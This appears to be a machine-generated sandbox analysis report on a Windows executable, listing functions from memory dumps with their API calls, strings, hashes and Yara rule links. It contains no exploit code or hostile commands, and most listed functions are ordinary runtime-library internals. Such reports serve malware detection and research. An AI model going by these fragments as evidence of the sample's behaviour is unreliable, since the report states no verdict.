Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLocal
String ID: GrantNTFSPermissions(): GetNamedSecurityInfo failed$GrantNTFSPermissions(): SetEntriesInAcl failed$GrantNTFSPermissions(): SetNamedSecurityInfoW failed$~`|+
API String ID: 2826327444-229648073
Opcode ID: 0fa7bfc1cf0fac5f25f659d0b467c2604842dd4bdd5f6e88fd575bc53a05b0bc
Instruction ID: d113c7e8dffbb12e7abb5ea691fb467dd0ed06a71efb37bdc139c051ebf4bc61
Opcode Fuzzy Hash: 0fa7bfc1cf0fac5f25f659d0b467c2604842dd4bdd5f6e88fd575bc53a05b0bc
Instruction Fuzzy Hash: B5414170900248EFEB10DF95DD45BEEBBB4EF04704F50415AF601A72D0DBB96A45CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004AAE90, Relevance: 9.1, APIs: 6, Instructions: 129COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 004AAE97
Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 004AAEE2
Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 004AAF15
Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 004AAF9D
Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 004AAFC5

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountCounter::_H_prolog3_catchRegisterReleaseStateState::_Structured
String ID:
API String ID: 1066115758-0
Opcode ID: c9fbd7af5f95fe6bdc653ec9d89ddb7d547a93ee9f071d198974ab1b73fbc5e7
Instruction ID: 599906c92f4ab41b9db9060819ba6457e35da828c203af58f998f73708fd3fae
Opcode Fuzzy Hash: c9fbd7af5f95fe6bdc653ec9d89ddb7d547a93ee9f071d198974ab1b73fbc5e7
Instruction Fuzzy Hash: 7E41A2B1A00605AFCB04DF69C9818AEFBB5FF99314714822FF41597780D738A911CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00458B85, Relevance: 9.1, APIs: 6, Instructions: 128COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00458BC5
DName::operator+.LIBCMT ref: 00458BD1

Part of subcall function 00453B9A: shared_ptr.LIBCMT ref: 00453BB6

DName::operator+=.LIBCMT ref: 00458CB3

Part of subcall function 00457768: DName::operator+.LIBCMT ref: 004577D3
Part of subcall function 00457768: DName::operator+.LIBCMT ref: 00457A91

Part of subcall function 00453AC5: DName::operator+.LIBCMT ref: 00453AE6

DName::operator+.LIBCMT ref: 00458C52

Part of subcall function 00453BF2: DName::operator=.LIBVCRUNTIME ref: 00453C13

DName::DName.LIBVCRUNTIME ref: 00458CD8
DName::operator+.LIBCMT ref: 00458CE4

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
String ID:
API String ID: 2795783184-0
Opcode ID: 27444d8f0cfacbb06e3527fa46330e15c4bb2478f36d86c66e2111489829baa2
Instruction ID: ab0407ff0effe82a85a8464f67ed02f2f8bdb2fd509d873640fbdb64fd8bd27f
Opcode Fuzzy Hash: 27444d8f0cfacbb06e3527fa46330e15c4bb2478f36d86c66e2111489829baa2
Instruction Fuzzy Hash: 304109B16002445FDB05DF68C855BEE7BE5AB05305F10405EE945A7383DF78AA49CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 004A824B, Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 004A828C
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 004A8294
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 004A82BE
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 004A82C7
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 004A834A
Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 004A8352

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
String ID:
API String ID: 3929269971-0
Opcode ID: be36db1eba27137eb17d7e6de1215d43a2fa97a904a02463618a4454344c3997
Instruction ID: a1ac29bb56d74dff0b9dcd7fa775d1c51e28aa89a8cc24393ccad829bf82112e
Opcode Fuzzy Hash: be36db1eba27137eb17d7e6de1215d43a2fa97a904a02463618a4454344c3997
Instruction Fuzzy Hash: A6415375A00519AFCF09DF68C454AAEBBB5FF99310F04819EE90697391CB78AE01CF85

Uniqueness

Uniqueness Score: -1.00%

Function 004526FA, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,004526F1,004505EF,0044D05B,2B7C607E,?,00000000,004B0F56,000000FF,?,00423698,?,?,?,kernel32.dll), ref: 00452708
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00452716
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0045272F
SetLastError.KERNEL32(00000000,?,004526F1,004505EF,0044D05B,2B7C607E,?,00000000,004B0F56,000000FF,?,00423698,?,?,?,kernel32.dll), ref: 00452781

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: d0d6fc6deed65496efafbd351273b05ac5f8fcb8c8edfbb89f06796488a20072
Instruction ID: c0bf1970a00e1f9a40bff625f5232b7515dcc5399f341dd83a01c37cf40c2575
Opcode Fuzzy Hash: d0d6fc6deed65496efafbd351273b05ac5f8fcb8c8edfbb89f06796488a20072
Instruction Fuzzy Hash: 6401D833108211AEA62567757D85A2F2744EB5777A720033FFE30441F3EF994C19955C

Uniqueness

Uniqueness Score: -1.00%

Function 00437180, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0043718F
GetLastError.KERNEL32 ref: 0043719C
DeleteCriticalSection.KERNEL32(?,2B7C607E), ref: 0043727C

Strings

tss, xrefs: 004371DC
~`|+, xrefs: 00437183, 00437207

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocCriticalDeleteErrorLastSection
String ID: tss$~`|+
API String ID: 941276211-3310268203
Opcode ID: 3e4850d535052f852f682285ecdffd1d071ea8bd8b77667e124b13f24840fd6d
Instruction ID: 168363dd5ab46ec9911f4ba743226debf3c89919e7c2f9bbf86a6532e0b07785
Opcode Fuzzy Hash: 3e4850d535052f852f682285ecdffd1d071ea8bd8b77667e124b13f24840fd6d
Instruction Fuzzy Hash: 71319E71A047149FCB10DF69C880A6BB7E4FF8C710F008AAAEA5597391DB38EC008B95

Uniqueness

Uniqueness Score: -1.00%

Function 0043F363, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104fileCOMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,?,00000000,00000002), ref: 0043F388
WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,?,00000000,00000002), ref: 0043F3A6
WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,2B7C607E,?,?), ref: 0043F44C

Strings

hp%E, xrefs: 0043F40A
~`|+, xrefs: 0043F41C

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ObjectPointerSingleWaitWrite
String ID: hp%E$~`|+
API String ID: 827693819-3081925015
Opcode ID: 663f0c0de13585c481f59f12ec244d4a0243883239b7c92e2a334a45eff98e99
Instruction ID: 6efd6d751652036a2b8cb8cb28c6a7c2a43a46b98f478552c60c49b14026bd8a
Opcode Fuzzy Hash: 663f0c0de13585c481f59f12ec244d4a0243883239b7c92e2a334a45eff98e99
Instruction Fuzzy Hash: 7A313932A04305AFD714CF65CC45B9FB7A9FF9A710F50462EF551932D0DB34A908CA99

Uniqueness

Uniqueness Score: -1.00%

Function 0049D17B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 0049D1DA
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0049D1FD
Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 0049D24E

Strings

ppVirtualProcessorRoots, xrefs: 0049D1F5
count, xrefs: 0049D193

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: CacheConcurrency::details::GroupLocalSchedule$Node::ProcessorSchedulingSegmentSegment::Virtualstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 18808576-3650809737
Opcode ID: d6b17f7212a32a1e3921dccc4fadd68a47855202d63f93beb17b7c5b17d15055
Instruction ID: 9b635531616332941bf4f38f56331eb6b9cc3a1e97ded9e7e8c0c539746e27e4
Opcode Fuzzy Hash: d6b17f7212a32a1e3921dccc4fadd68a47855202d63f93beb17b7c5b17d15055
Instruction Fuzzy Hash: D8218C35A00205AFDF04EF69C892EAD7BA5FF49314F10407FE5069B291CB79A901CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004AB310, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 004AB36B
std::invalid_argument::invalid_argument.LIBCONCRT ref: 004AB38A
Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 004AB3D3

Strings

pContext, xrefs: 004AB382

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::details::$ExecutionFreeIdleProcessorProxy::Root::SpinSuspendThreadUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1284976207-2046700901
Opcode ID: cc7641e1bf8cae263aca19a99bde9f0bf0fc1e1d31dfb8a60d201f73db95209b
Instruction ID: 28123d50931309f73a5913062c0efd559b19785d7dd214b4fae6d9431f98decb
Opcode Fuzzy Hash: cc7641e1bf8cae263aca19a99bde9f0bf0fc1e1d31dfb8a60d201f73db95209b
Instruction Fuzzy Hash: EE21EA317006159BCF14A769C895ABD73A5FFA6324F04056BE90187393CB7CBC418BC9

Uniqueness

Uniqueness Score: -1.00%

Function 0048A6E0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 0048A776
__Mtx_init_in_situ.LIBCPMT ref: 0048A7B5

Strings

RSA, xrefs: 0048AA8B
~`|+, xrefs: 0048AA7A, 0048AA7D
~`|+, xrefs: 0048A6F3, 0048AA66

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Mtx_init_in_situMtx_unlock
String ID: RSA$~`|+$~`|+
API String ID: 4113383456-173966438
Opcode ID: 960c7507a0d2957836f414501d15bfa0f5c773b66800936fe1fe580578d7af64
Instruction ID: 9bf39a1c91b74815b13c6efdfa971c6cb7dc0b412c02b8808cd75fe1a72dbc66
Opcode Fuzzy Hash: 960c7507a0d2957836f414501d15bfa0f5c773b66800936fe1fe580578d7af64
Instruction Fuzzy Hash: 78212871D802099BEB10EF958E82B2A73B4E701714F10457BF81093381E7BCA924C75E

Uniqueness

Uniqueness Score: -1.00%

Function 00447510, Relevance: 8.8, APIs: 7, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,0044726B,?), ref: 00447520
CloseHandle.KERNEL32(00000000,?,0044726B,?), ref: 0044753A
CloseHandle.KERNEL32(?,?,0044726B,?), ref: 0044754D
CloseHandle.KERNEL32(00000000,?,0044726B,?), ref: 00447567
CloseHandle.KERNEL32(?,?,0044726B,?), ref: 0044757A
CloseHandle.KERNEL32(00000000,?,0044726B,?), ref: 00447594
CloseHandle.KERNEL32(00000000,0044726B,?), ref: 004475A7

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 830e39dbd5a65a8511372e6579366b9393a9e8765d284977c117bac55210ec45
Instruction ID: 2d54e2154c7da4a203c75dff8b5427bfed173dfdc0769e6526a7e4cde91fcf44
Opcode Fuzzy Hash: 830e39dbd5a65a8511372e6579366b9393a9e8765d284977c117bac55210ec45
Instruction Fuzzy Hash: 721151311057159FEF29AB35C858A6733A8FF023553400E2FA157C7E90DB79E907CA58

Uniqueness

Uniqueness Score: -1.00%

Function 00423710, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,00000000), ref: 0042376F
VerSetConditionMask.KERNEL32(00000000), ref: 00423777
VerSetConditionMask.KERNEL32(00000000), ref: 0042377F
VerifyVersionInfoW.KERNEL32(00000023), ref: 004237A8

Strings

~`|+, xrefs: 00423716

Memory Dump Source

Source File: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ConditionMask$InfoVerifyVersion
String ID: ~`|+
API String ID: 2793162063-3443854377
Opcode ID: fa4355d341fd18c7c7875b48794d22e56ea212f42fd2e7df0805363c2eba7939
Instruction ID: 10c8d98414ac140cbb5ade5f21b10ab23358a603a79aa11db7e54301ebfc7b61
Opcode Fuzzy Hash: fa4355d341fd18c7c7875b48794d22e56ea212f42fd2e7df0805363c2eba7939
Instruction Fuzzy Hash: 7E1104B0644300AFF760EF60DC0AFAB76FCEB88700F40481DB645D61D1D7B89A188B66

Uniqueness

Uniqueness Score: -1.00%

Function 0043ACE0, Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 284COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,2B7C607E,?,?), ref: 0043AD69
LeaveCriticalSection.KERNEL32(?,?,?), ref: 0043ADD7
EnterCriticalSection.KERNEL32(?), ref: 0043AF1F
LeaveCriticalSection.KERNEL32(?), ref: 0043AFA1

Strings

~`|+, xrefs: 0043ACF7

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave
String ID: ~`|+
API String ID: 3168844106-3443854377
Opcode ID: f1b722768061a2ee264627f8b0eb02e247defe643e4b64f34698eadd7d3370d0
Instruction ID: 380e575d38a5584d40ac1f244a99375beeae5f915a2d2783c3b31063a5cc1b08
Opcode Fuzzy Hash: f1b722768061a2ee264627f8b0eb02e247defe643e4b64f34698eadd7d3370d0
Instruction Fuzzy Hash: 3CD10570E002199FDB15DF64C854BAEB7B5FF48304F10429AE519A7390DB74AE848F95

Uniqueness

Uniqueness Score: -1.00%

Function 0043AB00, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 144COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,2B7C607E,?,?,00000000), ref: 0043AB3C
LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 0043AB64
EnterCriticalSection.KERNEL32(?,?,?,00000000), ref: 0043ABC4
LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 0043AC6E

Strings

~`|+, xrefs: 0043AB17

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave
String ID: ~`|+
API String ID: 3168844106-3443854377
Opcode ID: 89f478d17422a440b5db1f01aa70a910c76b0dc2e360707f7a9203e16c681969
Instruction ID: 7f51775da079ca6032a556c08705790d355af880fdb155d25f2bd3b2efa7a6d0
Opcode Fuzzy Hash: 89f478d17422a440b5db1f01aa70a910c76b0dc2e360707f7a9203e16c681969
Instruction Fuzzy Hash: 3E51D331A002149FCF10DF69C984BAEBBB4FF19314F14519AE945A7381DB38AE14CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004A7440, Relevance: 7.6, APIs: 5, Instructions: 123COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 004A7474

Part of subcall function 004A22AC: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 004A22CD

Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 004A74D3
Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 004A74F9
Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 004A7519
Concurrency::location::_Assign.LIBCMT ref: 004A7566

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerThrowTraceWork
String ID:
API String ID: 1794448563-0
Opcode ID: 835de2a0fcabe3e6bc5b989a51191dfa1693583e81c20f0c554f87cda48a57e2
Instruction ID: cb3a00fc934db65915096063c1d5fdc40c980d55881effc16acbcb4881220c53
Opcode Fuzzy Hash: 835de2a0fcabe3e6bc5b989a51191dfa1693583e81c20f0c554f87cda48a57e2
Instruction Fuzzy Hash: A941E6B0B04210BBCF299B25CC85BAEBB65AF56314F04449FE90657782CF389D05CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 004A0C64, Relevance: 7.6, APIs: 5, Instructions: 101COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004A0C6B
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 004A0C95

Part of subcall function 0049731B: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00497338

Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 004A0D12
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 004A0D44
__freea.LIBCMT ref: 004A0D6A

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__freea
String ID:
API String ID: 2497068736-0
Opcode ID: 93d3b0a8dc103c5c8c8f4807c5eb3894d7258799e41db39436c88f3ccae9497b
Instruction ID: a7a9ec532ea28fc4b4aa562e6a60632a36b039f9c4e7800ad7ccb55fb37bf8d9
Opcode Fuzzy Hash: 93d3b0a8dc103c5c8c8f4807c5eb3894d7258799e41db39436c88f3ccae9497b
Instruction Fuzzy Hash: E6319271A002068FDB18DFA9C5815AEB7B5EF26314B24416FD805E7340DB78AD02CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004A2C91, Relevance: 7.6, APIs: 5, Instructions: 84threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00493EF5: mtx_do_lock.LIBCPMT ref: 00493EFD

